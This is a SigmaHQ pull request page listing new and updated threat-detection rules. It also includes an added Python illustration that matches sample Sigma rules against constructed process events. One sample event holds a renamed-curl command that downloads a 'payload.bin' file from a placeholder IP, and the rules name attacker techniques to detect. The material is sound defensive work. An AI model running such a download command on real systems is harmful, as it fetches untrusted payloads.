
Multiple Fixes & Enhancements #4427

Merged (31 commits) on Oct 4, 2023

Conversation

nasbench

@nasbench nasbench commented Sep 7, 2023

Summary of the Pull Request

This PR introduces multiple updates and enhancements, as well as new rules.

Changelog

  • new: Application Terminated Via Wmic.EXE
  • new: Browser Execution In Headless Mode
  • new: Chromium Browser Headless Execution To Mockbin Like Site
  • new: DarkGate User Created Via Net.EXE
  • new: DMP/HDMP File Creation
  • new: Malicious Driver Load
  • new: Malicious Driver Load By Name
  • new: Potentially Suspicious DMP/HDMP File Creation
  • new: Remote DLL Load Via Rundll32.EXE
  • new: Renamed CURL.EXE Execution
  • new: Vulnerable Driver Load
  • new: Vulnerable Driver Load By Name
  • update: 7Zip Compressing Dump Files - Increase coverage
  • update: Amsi.DLL Loaded Via LOLBIN Process - Reduce level to medium
  • update: COM Hijack via Sdclt - Fix Logic
  • update: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE - Increase coverage
  • update: Creation of an Executable by an Executable - Fix FP
  • update: DLL Load By System Process From Suspicious Locations - Reduce level to medium
  • update: DNS Query Request By Regsvr32.EXE - Reduce level to medium
  • update: DNS Query To MEGA Hosting Website - DNS Client - Update title and reduce level to medium
  • update: DNS Query To MEGA Hosting Website - Reduce level to low and update metadata
  • update: DNS Query To Remote Access Software Domain From Non-Browser App - Increase coverage with new domains
  • update: DNS Query To Ufile.io - DNS Client - Update title and reduce level to low
  • update: DNS Query To Ufile.io - Update title and reduce level to low
  • update: DNS Query Tor .Onion Address - Sysmon - Update title
  • update: DNS Server Discovery Via LDAP Query - Reduce level to low and update FP filters
  • update: DriverQuery.EXE Execution - Increase coverage
  • update: File Download From Browser Process Via Inline Link
  • update: Greedy File Deletion Using Del - Increase coverage
  • update: Leviathan Registry Key Activity - Fix logic
  • update: Network Connection Initiated By Regsvr32.EXE - Reduce level to medium and metadata update
  • update: Non Interactive PowerShell Process Spawned - Increase coverage
  • update: OceanLotus Registry Activity - Fix Logic
  • update: Office Application Startup - Office Test - Fix Logic
  • update: OneNote Attachment File Dropped In Suspicious Location - Fix FP
  • update: Potential Dead Drop Resolvers - Increase coverage with new domains
  • update: Potential Persistence Via COM Hijacking From Suspicious Locations - Increase coverage and fix logic
  • update: Potential Persistence Via COM Search Order Hijacking - Fix Logic
  • update: Potential Process Hollowing Activity - Update FP filters
  • update: Potential Recon Activity Using DriverQuery.EXE - Increase coverage
  • update: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE - Reduce level to medium
  • update: Potentially Suspicious Event Viewer Child Process - Update metadata
  • update: PowerShell Initiated Network Connection - Update description
  • update: PowerShell Module File Created By Non-PowerShell Process - Fix FP
  • update: PsExec Tool Execution From Suspicious Locations - PipeName - Reduce level to medium
  • update: Python Image Load By Non-Python Process - Update description and title
  • update: Python Initiated Connection - Update FP filter
  • update: Remote Thread Creation By Uncommon Source Image - Update FP filter
  • update: Renamed AutoIt Execution - Increase coverage
  • update: Suspicious Chromium Browser Instance Executed With Custom Extensions - Increase coverage
  • update: Suspicious WebDav Client Execution Via Rundll32.EXE - New Title
  • update: Sysinternals Tools AppX Versions Execution - Reduce level to low
  • update: Sysmon Blocked Executable - Update logsource
  • update: UAC Bypass via Event Viewer - Fix Logic
  • update: UNC2452 Process Creation Patterns - Fix logic
  • update: Usage Of Malicious POORTRY Signed Driver - Deprecated
  • update: Vulnerable AVAST Anti Rootkit Driver Load - Deprecated
  • update: Vulnerable Dell BIOS Update Driver Load - Deprecated
  • update: Vulnerable Driver Load By Name - Deprecated
  • update: Vulnerable GIGABYTE Driver Load - Deprecated
  • update: Vulnerable HW Driver Load - Deprecated
  • update: Vulnerable Lenovo Driver Load - Deprecated
  • update: WebDav Client Execution Via Rundll32.EXE
  • update: Windows Update Error - Reduce level to informational and status to stable
  • update: Winrar Compressing Dump Files - Increase Coverage

Example Log Event

N/A

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions
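Several of the rules listed above (for example "Renamed CURL.EXE Execution" and "Browser Execution In Headless Mode") are process-creation detections built from a Sigma selection, an optional filter and a condition. The block below is an added illustration of how such a rule is evaluated against log events; it is not code from this PR or from SigmaHQ's tooling. The two rule bodies are my approximations of what those titles suggest (OriginalFileName curl.exe with an Image that does not end in \curl.exe; a Chromium-family Image whose CommandLine contains --headless), not the PR's actual YAML, and the Sysmon-like events are constructed for the example.

```python
"""Minimal Sigma-style matcher (illustrative only, not SigmaHQ's tooling)."""
import fnmatch
import re

# Constructed Sysmon-like process-creation events (not real telemetry).
EVENTS = [
    {   # curl.exe copied under a new name; PE version info still says curl.exe
        "Image": r"C:\Users\Public\update.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": "update.exe -s -o payload.bin http://198.51.100.7/p",
    },
    {   # legitimate curl.exe from System32
        "Image": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": "curl.exe https://example.org",
    },
    {   # Chrome started headless to fetch and dump a page
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "OriginalFileName": "chrome.exe",
        "CommandLine": "chrome.exe --headless --disable-gpu --dump-dom https://example.org",
    },
    {   # ordinary interactive Chrome launch
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "OriginalFileName": "chrome.exe",
        "CommandLine": '"chrome.exe" --profile-directory=Default',
    },
]

# Illustrative rules modelled on the PR's titles; the logic is an assumption.
RULES = [
    {
        "title": "Renamed CURL.EXE Execution (illustrative)",
        "detection": {
            "selection": {"OriginalFileName": "curl.exe"},
            "filter": {"Image|endswith": "\\curl.exe"},
            "condition": "selection and not filter",
        },
    },
    {
        "title": "Browser Execution In Headless Mode (illustrative)",
        "detection": {
            "selection_img": {"Image|endswith": ["\\chrome.exe", "\\msedge.exe"]},
            "selection_cli": {"CommandLine|contains": "--headless"},
            "condition": "all of selection_*",
        },
    },
]


def _match_value(field_value, modifier, pattern):
    """Case-insensitive Sigma string match with the common modifiers."""
    if field_value is None:
        return False
    v, p = str(field_value).lower(), str(pattern).lower()
    if modifier == "contains":
        return p in v
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "endswith":
        return v.endswith(p)
    return fnmatch.fnmatchcase(v, p)   # plain value: Sigma allows * and ? wildcards


def _match_selection(event, selection):
    """Fields in a map are ANDed; list values are ORed unless |all is present."""
    for key, pattern in selection.items():
        field, *mods = key.split("|")
        require_all = "all" in mods
        mods = [m for m in mods if m != "all"]
        modifier = mods[0] if mods else ""
        patterns = pattern if isinstance(pattern, list) else [pattern]
        hits = [_match_value(event.get(field), modifier, p) for p in patterns]
        if not (all(hits) if require_all else any(hits)):
            return False
    return True


_TOKEN = re.compile(r"\(|\)|[\w*]+")


def _evaluate(condition, results):
    """Recursive-descent evaluation of and/or/not, parentheses, 'all of X*', '1 of X*'."""
    tokens, pos = _TOKEN.findall(condition), 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def parse_or():
        left = parse_and()
        while peek() == "or":
            take()
            right = parse_and()
            left = left or right
        return left

    def parse_and():
        left = parse_not()
        while peek() == "and":
            take()
            right = parse_not()
            left = left and right
        return left

    def parse_not():
        if peek() == "not":
            take()
            return not parse_not()
        return parse_atom()

    def parse_atom():
        tok = take()
        if tok == "(":
            val = parse_or()
            take()                       # closing ')'
            return val
        if tok in ("all", "1") and peek() == "of":
            take()                       # 'of'
            pattern = take()             # e.g. selection_* or them
            names = list(results) if pattern == "them" else \
                [n for n in results if fnmatch.fnmatchcase(n, pattern)]
            vals = [results[n] for n in names]
            return all(vals) if tok == "all" else any(vals)
        return results[tok]

    return parse_or()


def run_rule(rule, event):
    """Evaluate every named selection, then the condition, for one event."""
    detection = rule["detection"]
    results = {name: _match_selection(event, sel)
               for name, sel in detection.items() if name != "condition"}
    return _evaluate(detection["condition"], results)


def alerts(rules, events):
    """Return (rule title, Image) for every rule that fires on every event."""
    return [(r["title"], e["Image"]) for e in events for r in rules if run_rule(r, e)]


if __name__ == "__main__":
    for title, image in alerts(RULES, EVENTS):
        print(f"{title}: {image}")
```

Running it fires the renamed-curl rule only on the first event (the System32 copy is excluded by the filter) and the headless rule only on the third. The filter on Image is what keeps the curl rule from alerting on every legitimate curl invocation; when extending such a rule, widen the selection (for example, other OriginalFileName values) rather than loosening the filter.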

@nasbench nasbench requested a review from phantinuss September 29, 2023 11:51
@nasbench nasbench marked this pull request as ready for review September 29, 2023 11:51
phantinuss and others added 5 commits October 2, 2023 11:20
nasbench and others added 2 commits October 4, 2023 11:18
…ne_file_download.yml

Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com>
…mium_mockbin_abuse.yml

Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com>
@frack113 frack113 left a comment


LGTM

@nasbench nasbench changed the title Service Creation Rules Update Multiple Fixes & Enhancements Oct 4, 2023
@nasbench nasbench merged commit e230acd into SigmaHQ:master Oct 4, 2023
10 checks passed